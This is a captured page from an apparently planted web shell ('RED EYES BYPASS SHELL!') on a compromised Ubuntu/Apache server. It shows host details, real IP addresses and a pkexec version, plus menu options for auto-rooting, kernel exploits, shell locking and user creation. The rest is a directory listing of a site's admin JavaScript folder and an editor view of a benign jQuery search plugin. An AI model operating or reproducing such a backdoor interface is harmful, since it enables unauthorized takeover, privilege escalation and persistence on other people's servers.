Linux sothorn202 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
rdiresearch /
admin /
assets /
assets /
js /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
menu
[ DIR ]
drwxr-xr-x
SmoothScroll.js
19.96
KB
-rwxr-xr-x
animation.js
640
B
-rwxr-xr-x
bootstrap-growl.min.js
5.57
KB
-rwxr-xr-x
classie.js
1.79
KB
-rwxr-xr-x
color-json-common-page.js
0
B
-rwxr-xr-x
common-pages.js
296
B
-rwxr-xr-x
counter.js
2.18
KB
-rwxr-xr-x
demo-box.js
13.51
KB
-rwxr-xr-x
demo-dark-light.js
13.51
KB
-rwxr-xr-x
demo-dark.js
13.51
KB
-rwxr-xr-x
demo-image.js
14.64
KB
-rwxr-xr-x
demo-light-dark.js
13.51
KB
-rwxr-xr-x
horizontal-layout.js
11.25
KB
-rwxr-xr-x
horizontal-layout.min.js
6.5
KB
-rwxr-xr-x
jquery.easypiechart.min.js
3.9
KB
-rwxr-xr-x
jquery.mCustomScrollbar.concat.min.js
44.41
KB
-rwxr-xr-x
jquery.mousewheel.min.js
2.71
KB
-rwxr-xr-x
jquery.quicksearch.js
4.6
KB
-rwxr-xr-x
modal.js
2.75
KB
-rwxr-xr-x
modalEffects.js
1.33
KB
-rwxr-xr-x
owl-custom.js
209
B
-rwxr-xr-x
pcoded.min.js
51
KB
-rwxr-xr-x
rating.js
3.61
KB
-rwxr-xr-x
script.js
17.59
KB
-rwxr-xr-x
script.min.js
11
KB
-rwxr-xr-x
sweetalert.js
16.58
KB
-rwxr-xr-x
swiper-custom.js
705
B
-rwxr-xr-x
vartical-layout.js
13.51
KB
-rwxr-xr-x
vartical-layout.min.js
5.78
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jquery.quicksearch.js
(function($, window, document, undefined) { $.fn.quicksearch = function (target, opt) { var timeout, cache, rowcache, jq_results, val = '', e = this, options = $.extend({ delay: 100, selector: null, stripeRows: null, loader: null, noResults: '', matchedResultsCount: 0, bind: 'keyup', onBefore: function () { return; }, onAfter: function () { return; }, show: function () { this.style.display = ""; }, hide: function () { this.style.display = "none"; }, prepareQuery: function (val) { return val.toLowerCase().split(' '); }, testQuery: function (query, txt, _row) { for (var i = 0; i < query.length; i += 1) { if (txt.indexOf(query[i]) === -1) { return false; } } return true; } }, opt); this.go = function () { var i = 0, numMatchedRows = 0, noresults = true, query = options.prepareQuery(val), val_empty = (val.replace(' ', '').length === 0); for (var i = 0, len = rowcache.length; i < len; i++) { if (val_empty || options.testQuery(query, cache[i], rowcache[i])) { options.show.apply(rowcache[i]); noresults = false; numMatchedRows++; } else { options.hide.apply(rowcache[i]); } } if (noresults) { this.results(false); } else { this.results(true); this.stripe(); } this.matchedResultsCount = numMatchedRows; this.loader(false); options.onAfter(); return this; }; /* * External API so that users can perform search programatically. * */ this.search = function (submittedVal) { val = submittedVal; e.trigger(); }; /* * External API to get the number of matched results as seen in * https://github.com/ruiz107/quicksearch/commit/f78dc440b42d95ce9caed1d087174dd4359982d6 * */ this.currentMatchedResults = function() { return this.matchedResultsCount; }; this.stripe = function () { if (typeof options.stripeRows === "object" && options.stripeRows !== null) { var joined = options.stripeRows.join(' '); var stripeRows_length = options.stripeRows.length; jq_results.not(':hidden').each(function (i) { $(this).removeClass(joined).addClass(options.stripeRows[i % stripeRows_length]); }); } return this; }; this.strip_html = function (input) { var output = input.replace(new RegExp('<[^<]+\>', 'g'), ""); output = $.trim(output.toLowerCase()); return output; }; this.results = function (bool) { if (typeof options.noResults === "string" && options.noResults !== "") { if (bool) { $(options.noResults).hide(); } else { $(options.noResults).show(); } } return this; }; this.loader = function (bool) { if (typeof options.loader === "string" && options.loader !== "") { (bool) ? $(options.loader).show() : $(options.loader).hide(); } return this; }; this.cache = function () { jq_results = $(target); if (typeof options.noResults === "string" && options.noResults !== "") { jq_results = jq_results.not(options.noResults); } var t = (typeof options.selector === "string") ? jq_results.find(options.selector) : $(target).not(options.noResults); cache = t.map(function () { return e.strip_html(this.innerHTML); }); rowcache = jq_results.map(function () { return this; }); /* * Modified fix for sync-ing "val". * Original fix https://github.com/michaellwest/quicksearch/commit/4ace4008d079298a01f97f885ba8fa956a9703d1 * */ val = val || this.val() || ""; return this.go(); }; this.trigger = function () { this.loader(true); options.onBefore(); window.clearTimeout(timeout); timeout = window.setTimeout(function () { e.go(); }, options.delay); return this; }; this.cache(); this.results(true); this.stripe(); this.loader(false); return this.each(function () { /* * Changed from .bind to .on. * */ $(this).on(options.bind, function () { val = $(this).val(); e.trigger(); }); }); }; }(jQuery, this, document));
Close